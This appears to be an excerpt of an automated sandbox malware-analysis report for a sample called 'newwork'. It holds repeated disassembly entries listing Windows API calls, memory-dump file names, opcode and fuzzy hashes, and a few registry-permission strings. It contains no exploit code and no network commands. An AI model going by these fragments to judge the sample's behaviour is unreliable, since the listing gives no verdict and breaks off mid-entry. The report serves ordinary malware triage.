                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                        • API String ID: 1452528299-1580325520
                                                                                        • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                        • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                        • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                        • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                        • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDeviceMetricsSystem$Release
                                                                                        • String ID:
                                                                                        • API String ID: 447804332-0
                                                                                        • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                        • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                        • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                        • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                        • LocalFree.KERNEL32(005DF2B0,00000000,00401B68), ref: 00401ACF
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,005DF2B0,00000000,00401B68), ref: 00401AEE
                                                                                        • LocalFree.KERNEL32(005E02B0,?,00000000,00008000,005DF2B0,00000000,00401B68), ref: 00401B2D
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                        • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3782394904-0
                                                                                        • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                        • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                        • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                        • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                        • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                        • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$Show
                                                                                        • String ID:
                                                                                        • API String ID: 3609083571-0
                                                                                        • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                        • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                        • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                        • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                        APIs
                                                                                          • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                        • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                        • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                          • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                        • String ID:
                                                                                        • API String ID: 3527656728-0
                                                                                        • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                        • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                        • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                        • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateFileHandle
                                                                                        • String ID: !nI$.tmp$_iu
                                                                                        • API String ID: 3498533004-584216493
                                                                                        • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                        • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                        • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                        • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                        APIs
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                          • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                        • String ID: .dat$.msg$IMsg$Uninstall
                                                                                        • API String ID: 3312786188-1660910688
                                                                                        • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                        • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                        • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                        • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                        • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                        • API String ID: 828529508-2866557904
                                                                                        • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                        • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                        • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                        • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                        APIs
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                        • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                        • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                        • API String ID: 2573145106-3235461205
                                                                                        • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                        • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                        • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                        • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                        • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                        • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                        • API String ID: 3478007392-2498399450
                                                                                        • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                        • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                        • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                        • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                        APIs
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                        • String ID: AllowSetForegroundWindow$user32.dll
                                                                                        • API String ID: 1782028327-3855017861
                                                                                        • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                        • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                        • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                        • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                        APIs
                                                                                        • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                        • SaveDC.GDI32(?), ref: 00416C83
                                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                        • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                        • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                        • String ID:
                                                                                        • API String ID: 3808407030-0
                                                                                        • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                        • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                        • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                        • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                        • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                        • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                        • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                        • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                        • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                        • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                        • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                        • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                        • GetDC.USER32(00000000), ref: 0041BC12
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                        • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 1095203571-0
                                                                                        • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                        • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                        • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                        • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                        APIs
                                                                                          • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                        Strings
                                                                                        • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                        • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                        • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
